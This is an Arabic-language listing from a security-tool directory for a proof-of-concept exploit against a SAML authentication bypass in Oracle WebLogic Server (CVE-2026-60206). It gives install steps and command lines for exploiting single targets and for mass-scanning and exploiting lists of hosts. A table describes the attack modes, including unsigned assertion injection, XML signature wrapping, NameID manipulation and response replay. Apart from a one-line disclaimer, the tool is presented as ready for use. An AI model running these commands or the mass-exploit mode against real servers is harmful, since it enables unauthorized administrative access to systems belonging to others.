Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC-CVE-2026-60206 — cve cve-2026-60206 weblogic saml exploit poc ثغرة oracle ماسح أمن | Kitploit
أدوات/GitHubGitHub/imbas007/poc-cve-2026-60206
المصادقة والترخيصماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubimbas007/poc-cve-2026-60206

POC-CVE-2026-60206

cve cve-2026-60206 weblogic saml exploit poc ثغرة oracle ماسح أمن

عرض المستودع
3294منذ شهر واحدتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-60206 — تجاوز مصادقة SAML في Oracle WebLogic

CVE CVSS

CVSS 9.9 — تجاوز مصادقة SAML في نواة Oracle WebLogic Server.
الإصدارات المتأثرة: 12.2.1.4.0 14.1.1.0.0 14.1.2.0.0 15.1.1.0.0

⚠️ لأغراض الاختبار الأمني المصرّح به فقط.


التثبيت

root@kitploit:~
git clone https://github.com/imbas007/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

الاستخدام

هدف واحد

root@kitploit:~
# Detect version + SAML endpoints
python3 CVE-2026-60206-exploit.py -t https://target:7002 --detect

# Full exploit (all attack vectors)
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all -u weblogic

# Specific mode
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode combo -u admin -v

# With proxy
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all --proxy http://127.0.0.1:8080 --no-verify

الفحص الجماعي

root@kitploit:~
# Detect only
python3 CVE-2026-60206-exploit.py -l targets.txt -o results.json

# Detect + exploit (faster)
python3 CVE-2026-60206-exploit.py -l targets.txt --exploit --no-verify -T 30 -o results.json

# Single URL mass mode
python3 CVE-2026-60206-exploit.py -l https://target:7002 --exploit

ملف الأهداف (هدف واحد لكل سطر):

root@kitploit:~
192.168.1.100:7002
https://10.0.0.50
example.com

عرض أوضاع الهجوم

root@kitploit:~
python3 CVE-2026-60206-exploit.py --list-modes

أوضاع الهجوم


هيكل المشروع

root@kitploit:~
CVE-2026-60206/
├── CVE-2026-60206-exploit.py   # Main script (single + mass)
├── mass_scan.py                # Mass scanner module
├── modules/
│   ├── samlib.py               # SAML manipulation (XSW, NameID, etc.)
│   ├── weblogic_client.py      # WebLogic HTTP client
│   └── logger.py               # Colored logging
├── requirements.txt
└── README.md

المراجع

  • تحديث Oracle الأمني لشهر يوليو 2026
  • NVD: CVE-2026-60206
  • ثغرات WebLogic SAML: CVE-2018-2933 و CVE-2018-2998
تنزيل الأداة
الوضعالوصف
unsignedحقن تأكيد SAML غير موقّع
xswالالتفاف على توقيع XML (4 أشكال)
nameidالتلاعب بـ NameID / حقن التعليقات
comboمدمج: XSW + Unsigned + NameID ⭐
audienceتجاوز قيد AudienceRestriction
conditionsتجاوز قيود الوقت/الصلاحية
replayإعادة تشغيل استجابة SAML
allتشغيل كل شيء